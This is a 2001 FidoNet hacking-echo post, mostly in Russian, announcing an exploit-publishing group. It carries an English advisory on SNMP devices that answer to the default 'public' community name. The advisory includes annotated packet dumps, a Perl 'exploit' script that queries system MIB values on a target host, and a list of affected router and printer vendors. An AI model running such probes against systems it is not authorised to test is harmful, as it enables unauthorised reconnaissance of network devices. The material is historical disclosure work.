ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Andrey Sokolov                       2:5020/1057.100 04 Apr 2001  01:13:51
 To : All
 Subject : Минyткy внимания...
 -------------------------------------------------------------------------------- 
 

 
     Гpyппа underlings пpиняла pешение наконец-таки "вылезти на повеpхность" и
 начать "общественно-полезнyю" деятельность. Hа данный момент, мы намеpены
 заниматься пyбликацией найденных нами интеpесных (с нашей точки зpения)
 yязвимостей в виде более-менее полных и инфоpмативных эксплоитов.
 
     Мы намеpены пyбликоваться на пакетштоpме и на багтpеке на английском языке. 
 Если область наших интеpесов покажется интеpесной местной пyблике (и, особенно, 
 yважаемомy модеpатоpy Славе Мяснянкинy :))), мы бyдем составлять одновpеменно
 pyсскоязычные веpсии этих докyментов и пyбликовать их здесь. (void.ru? xakep.ru?
 hackzone.ru?)
 
     Хочy ещё pаз настойчиво попpосить yважаемyю общественность: не надо y меня
 спpашивать "где взять rfc?" или "как захакать маздай, помоги начинающемy" или
 "дай мне инфy по хакy". Это вне области интеpесов моей гpyппы и меня лично.
 
 === RFU0001E.TXT ===
 
          -={[ SNMP supporting network devices vulnerability exploit ]}=-
                             english edition
 
 -=<( Authors
 
  VBh     // underlings
  Privacy // underlings
 
 -=<( Authors' requisites
 
  format   : ASCII, 80 characters per string
  date     : 2001, April 3rd
  feedback : privacy@chat.ru
 
 -=<( Introduction
 
     SNMP (Simple Network Management Protocol) is supported by a huge amount
 of network devices (such as, for example, network printer adapters, routers,
 etc). One of the rfc documents that specify SNMP protocol, proclaims
 aproximately following: "a network device may be considered completely operated
 if it implements SNMP protocol".
 
     Following SNMP standard, the whole information required to operate a
 remote network device is being kept directly in its memory, in MIB (Management
 Information Base). As itself, SNMP protocol represents a user level interface
 to control a remote MIB.
 
     While performing a remote SNMP request, a "community name" option field
 is used as an identifier.
 
     Let us take a slight look at a typical SNMP request:
 
 0000:  20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00  SRC..DEST....E.
 0010:  00 4F 39 00 00 00 80 11 CC CC XX XX XX XX YY YY .O9........"....
 0020:  YY YY 04 03 00 A1 00 3B CC CC 30 82 00 2F 02 01 .......;..0../..
 0030:  00 04 06 49 44 45 4E 54 36 A1 82 00 20 02 02 2C ...IDENT6... ..,
 0040:  B0 02 01 00 02 01 00 30 82 00 12 30 82 00 0E 06 .......0...0....
 0050:  0A 2B 06 01 02 01 02 02 01 02 01 05 00          .+...........
 
     Here goes an answer for the request performed above:
 
 0000:  44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST.. SRC....E.
 0010:  00 5D 01 93 00 00 77 11 CC CC YY YY YY YY XX XX .]....w..K....."
 0020:  XX XX 00 A1 04 03 00 49 CC CC 30 3F 02 01 00 04 .......I.E0?....
 0030:  06 49 44 45 4E 54 36 A2 32 02 02 2C B0 02 01 00 .IDENT6.2..,....
 0040:  02 01 00 30 26 30 24 06 0D 2B 06 01 02 01 02 02 ...0&0$..+......
 0050:  01 02 88 80 80 03 04 13 33 43 6F 6D 20 45 74 68 ........3Com Eth
 0060:  65 72 4C 69 6E 6B 20 50 43 49 00                erLink PCI.
 
     (to keep a desirable privacy, we fill IP header's Source and Destination
 IP address fields accordingly with XX.XX.XX.XX and YY.YY.YY.YY; IP and UDP
 headers' checksum fields are filled with CC.CC; SNMP request's community name
 field contains six bytes of a random string "IDENT6")
 
     Obviously, we can get an opportunity to interact with a remote MIB only
 knowing a "community name" which is set up at a remote SNMP-agent.
 
 -=<( Vulnerability
 
     It seems that many remote network devices that support SNMP protocol
 successfully process a default community name, "public".
 
     Here goes an SMNP-request that contains a string "public" as a community
 name:
 
 0000:  20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00  SRC..DEST....E.
 0010:  00 AD 35 00 00 00 80 11 CC CC XX XX XX XX YY YY ..5........"....
 0020:  YY YY 04 03 00 A1 00 99 CC CC 30 82 00 8D 02 01 ........) 0.....
 0030:  00 04 06 70 75 62 6C 69 63 A0 82 00 7E 02 02 2C ...public......,
           ^^ - "string" type
              ^^ - string length
                 ^^ ^^ ^^ ^^ ^^ ^^ - community name
 0040:  AC 02 01 00 02 01 00 30 82 00 70 30 82 00 0C 06 .......0..p0....
 0050:  08 2B 06 01 02 01 01 01 00 05 00 30 82 00 0C 06 .+.........0....
 0060:  08 2B 06 01 02 01 01 02 00 05 00 30 82 00 0C 06 .+.........0....
 0070:  08 2B 06 01 02 01 01 03 00 05 00 30 82 00 0C 06 .+.........0....
 0080:  08 2B 06 01 02 01 01 04 00 05 00 30 82 00 0C 06 .+.........0....
 0090:  08 2B 06 01 02 01 01 05 00 05 00 30 82 00 0C 06 .+.........0....
 00A0:  08 2B 06 01 02 01 01 06 00 05 00 30 82 00 0C 06 .+.........0....
 00B0:  08 2B 06 01 02 01 02 01 00 05 00                .+.........
 
     After performing a request brought above, we gather the following
 reply:
 
 0000:  44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST.. SRC....E.
 0010:  01 32 01 8F 00 00 77 11 CC CC YY YY YY YY XX XX .2....w..z....."
 0020:  XX XX 00 A1 04 03 01 1E CC CC 30 82 01 12 02 01 .........)0.....
 0030:  00 04 06 70 75 62 6C 69 63 A2 82 01 03 02 02 2C ...public......,
 0040:  AC 02 01 00 02 01 00 30 81 F6 30 81 8A 06 08 2B .......0..0....+
 0050:  06 01 02 01 01 01 00 04 7E 48 61 72 64 77 61 72 .........Hardwar
 0060:  65 3A 20 78 38 36 20 46 61 6D 69 6C 79 20 36 20 e: x86 Family 6
 0070:  4D 6F 64 65 6C 20 37 20 53 74 65 70 70 69 6E 67 Model 7 Stepping
 0080:  20 33 20 41 54 2F 41 54 20 43 4F 4D 50 41 54 49  3 AT/AT COMPATI
 0090:  42 4C 45 20 2D 20 53 6F 66 74 77 61 72 65 3A 20 BLE - Software:
 00A0:  57 69 6E 64 6F 77 73 20 32 30 30 30 20 56 65 72 Windows 2000 Ver
 00B0:  73 69 6F 6E 20 35 2E 30 20 28 42 75 69 6C 64 20 sion 5.0 (Build
 00C0:  32 31 39 35 20 55 6E 69 70 72 6F 63 65 73 73 6F 2195 Uniprocesso
 00D0:  72 20 46 72 65 65 29 30 18 06 08 2B 06 01 02 01 r Free)0...+....
 00E0:  01 02 00 06 0C 2B 06 01 04 01 82 37 01 01 03 01 .....+.....7....
 00F0:  02 30 0F 06 08 2B 06 01 02 01 01 03 00 43 03 0E .0...+.......C..
 0100:  43 76 30 0C 06 08 2B 06 01 02 01 01 04 00 04 00 Cv0...+......
 0110:  30 11 06 08 2B 06 01 02 01 01 05 00 04 05 55 4D 0...+.........UM
 0120:  50 52 55 30 0C 06 08 2B 06 01 02 01 01 06 00 04 PRU0...+........
 0130:  00 30 0D 06 08 2B 06 01 02 01 02 01 00 02 01 02 .0...+..........
 
     Here goes a little program written in perl that implements a remote MIB
 interviewing via "public" used as a community name:
 
 -=<( Exploit program
 
 use IO::Socket;
 use strict;
 
 print "SMTP analyzer via community name 'public' done by VBh // underlings\n";
 
 my($sock, $host, $pkt, $msg, $port, $ipaddr, $hishost,
    $MAXLEN, $Lport,$DSTport, $TIMEOUT, $community, $oid);
 
 $community="public";
 
 $MAXLEN  = 1024;
 $Lport = 5151;
 my @str= ("sysDescr","sysObjectID","sysUpTime","sysContact","sysName",
 "sysLocation", "sysServices");
 
 unless (@ARGV == 2) { die "usage: $0 <host> <port>" }
 ($host, $DSTport) = @ARGV;
 
 for (my $i=1; $i<=7; $i++) {
 $oid="\x2B\x06\x01\x02\x01\x01".chr($i);
 
 $pkt = "\x30".chr(length($community)+length($oid)+25)."\x02\x01\x00".
        "\x04\x06".$community.
        "\xA0\x19\x02\x01\x00\x02\x01\x00".
        "\x02\x01\x00\x30\x0E\x30\x0C\x06".
        chr(length($oid)+1).$oid."\x00".
        "\x05\x00";
 
 $sock = IO::Socket::INET->new (Proto     => 'udp',
                                LocalPort => $Lport+$i,
                                PeerPort  => $DSTport,
                                PeerAddr  => $host) ||
  die "Creating socket: $!\n";
 
 $sock->send($pkt) || die "send: $!";
 
 while ($sock->recv($msg, $MAXLEN)) {
 print "$host $str[$i-1]: ".unpack("x40 A*", $msg)."\r\n";
 shutdown ($sock, 2);
 }}
 
 -=<( Statistics
 
     It wasn't our purpose to collect a huge statistics list concerning this
 vulnerability. Here is a small remote systems list we have already tested this
 vulnerability at:
 
     - 3Com routers (SuperStack II), various 3Com network adapters
     - Cisco routers
     - Templex routers
     - Hewlett Packard network printers
     - Xerox network printers
 
     We suppose, under a certain persistence, this list may be greatly
 expanded.
 
 -=<( Destructive possibility
 
     Besides this all said above, there are some network devices that afford a
 possibility to produce records in its MIBs. All our tests we performed on the
 whole straightedge of Hewlett Packard network printers confirmed this
 supposition.
 
     Under the comprehensible reasons, we won't publish an exploit program
 that implements this destructive possibility.
 
 -=<( Additional information
 
   Basic rfc documents which specify SNMP and MIB II concepts:
 
     1) 1157, "A Simple Network Management Protocol (SNMP)". You may easily
 find a sufficient amount of information concerning SNMP protocol programming
 stuff.
     2) 1213, "Management Information Base for Network Management of
 TCP/IP-based internets: MIB-II"
 
   Additional rfcs:
 
     3) 1067, 1098, 1158, 1161, 1212, 1239, 1303, 1351, 1352, 1354, 1441, 1442,
 1443, 1444, 1445, 1446, 1447, 1448, 1449, 1450, 1573, 1901, 1902, 1903, 1904,
 1905, 1906, 1907, 1908, 1909, 1910, 2011, 2012, 2013
 
     You may also find some sence in searching for the native snmp agents and
 managers documentation and programs.
 
 === RFU0001E.TXT ===
 
 Cheers, [Privacy], _/daedalus@inbox.ru_/
 
                                                 [_underlings_]
 ---
  * Origin: Originated by 3BEPb (2:5020/1057.100)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор